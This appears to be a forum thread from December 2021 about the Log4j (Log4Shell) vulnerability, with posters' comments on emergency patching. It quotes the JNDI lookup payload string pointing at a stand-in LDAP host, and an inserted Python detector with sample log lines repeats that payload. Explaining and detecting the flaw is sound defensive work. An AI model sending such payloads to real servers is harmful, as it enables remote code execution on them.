Posted on 12/12/2021 9:08:33 PM PST by blueplum
The worst! IN HISTORY!
Good grief.
It’s the Omicron hack.
I know the programmers in my company spent a long Friday night doing code fixes for this. I wouldn’t be surprised if a lot of software across the US was taken down for repairs over the weekend.
Technical article on the exploit
The vulnerability is triggered by a simple string sent to a vulnerable server:
${jndi:ldap://example.com/a}
When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.
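A defender-side check for the string described above, as an added example that is not part of the original thread or the quoted article: it scans log lines for the `${jndi:...}` lookup form, including a URL-encoded copy, and reports the remote host. The function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the lookup form quoted above: ${jndi:<scheme>://<host>...}
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def normalize(line, max_rounds=3):
    """URL-decode repeatedly so %24%7Bjndi... is seen as ${jndi..."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_lookups(lines):
    """Return (line_number, scheme, host) for each JNDI lookup string found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI_RE.finditer(normalize(line)):
            hits.append((number, match.group(1).lower(), match.group(2).lower()))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.com/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:19 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.com%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.4 - - [10/Dec/2021:14:03:01 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, host in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

A hit shows that the string reached the log, not that the lookup succeeded; outbound connections from the server to the reported host are the next thing to check.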
eBay sent an unusual email early Friday morning saying they were turning off their automatic payment system. The explanation was vague but it made me wonder if they were having an IT security issue.
Read later.
I agree ... ‘java’ is for people who are not mentally sharp or disciplined enough to learn ‘c++’.
Let the firestorm ensue ...
bttt
You have my empathy. Teams in my division haven’t stopped since Thursday PM when the CVE published. This is a nasty one.
log4j bookmark